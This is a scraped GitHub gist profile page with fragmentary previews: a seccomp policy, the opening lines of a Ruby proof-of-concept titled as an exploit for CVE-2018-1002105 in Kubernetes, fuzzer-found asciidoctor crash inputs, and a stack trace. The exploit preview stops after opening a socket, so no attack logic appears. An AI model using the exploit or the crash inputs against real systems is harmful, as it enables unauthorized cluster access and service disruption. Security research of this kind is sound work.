Skip to content

Instantly share code, notes, and snippets.

View zelivans's full-sized avatar
🎯
Focusing

zelivans

🎯
Focusing
  • Mountain View, CA
View GitHub Profile
{
"defaultAction": "SCMP_ACT_ERRNO",
"archMap": [
{
"architecture": "SCMP_ARCH_X86_64",
"subArchitectures": [
"SCMP_ARCH_X86",
"SCMP_ARCH_X32"
]
},
@zelivans
zelivans / poc.rb
Last active August 14, 2020 20:21
CVE-2018-1002105 exploit
#!/usr/bin/env ruby
require 'socket'
require 'openssl'
require 'json'
host = 'kubernetes'
metrics = '/apis/metrics.k8s.io/v1beta1'
sock = TCPSocket.new host, 443
<x0:modifications xmlns:x0="">0<x0:a00end e="">0<edam e="">0</edam>0</x0:a00end>0<x0:e/><x0:if>0<x0:insert-0efore e="">0<c0eese>0</c0eese>0</x0:insert-0efore>0</x0:if>0<x0:insert-0efore t="">0<c0eese>0</c0eese>0</x0:insert-0efore>0<x0:if t="">0<x0:insert-0efore t="">0<sa0sages>0</sa0sages>0</x0:insert-0efore>0</x0:if>0<x0:varia0le xmlns:e="" m="">0<r/>0<!---->0<? ?>0</x0:varia0le>0<x0:e e="" t=""/>0<x0:insert-after e="" x="" :e="">0<x0:f t=""/>0<x0:f t=""/>0<x0:f e=""/>0</x0:insert-after>0</x0:modifications>0
+ ::** t :: ** t::
(* t<r::>::
** t<r::>
for i in encoding_crash/*; do ruby -I asciidoctor/lib/ asciidoctor/bin/asciidoctor --trace $i 2>&1; done;
/home/ariel/afl-kisaten/private/sandbox/asciidoctor/asciidoctor/lib/asciidoctor/helpers.rb:78:in `encode': asciidoctor: FAILED: /home/ariel/afl-kisaten/private/sandbox/asciidoctor/encoding_crash/id:000000,sig:10,src:000048,op:havoc,rep:128: Failed to load AsciiDoc document - "\xDDc" on UTF-16BE (Encoding::InvalidByteSequenceError)
from /home/ariel/afl-kisaten/private/sandbox/asciidoctor/asciidoctor/lib/asciidoctor/helpers.rb:78:in `block in normalize_lines_array'
from /home/ariel/afl-kisaten/private/sandbox/asciidoctor/asciidoctor/lib/asciidoctor/helpers.rb:78:in `map'
from /home/ariel/afl-kisaten/private/sandbox/asciidoctor/asciidoctor/lib/asciidoctor/helpers.rb:78:in `normalize_lines_array'
from /home/ariel/afl-kisaten/private/sandbox/asciidoctor/asciidoctor/lib/asciidoctor/reader.rb:92:in `prepare_lines'
from /home/ariel/afl-kisaten/private/sandbox/asciidoctor/asciidoctor/lib/asciidoctor/reader.rb
@zelivans
zelivans / handcraft.sub
Created September 20, 2018 17:41
asciidoctor restore_passthroughs crash
[']\+++++++++This++++++++++++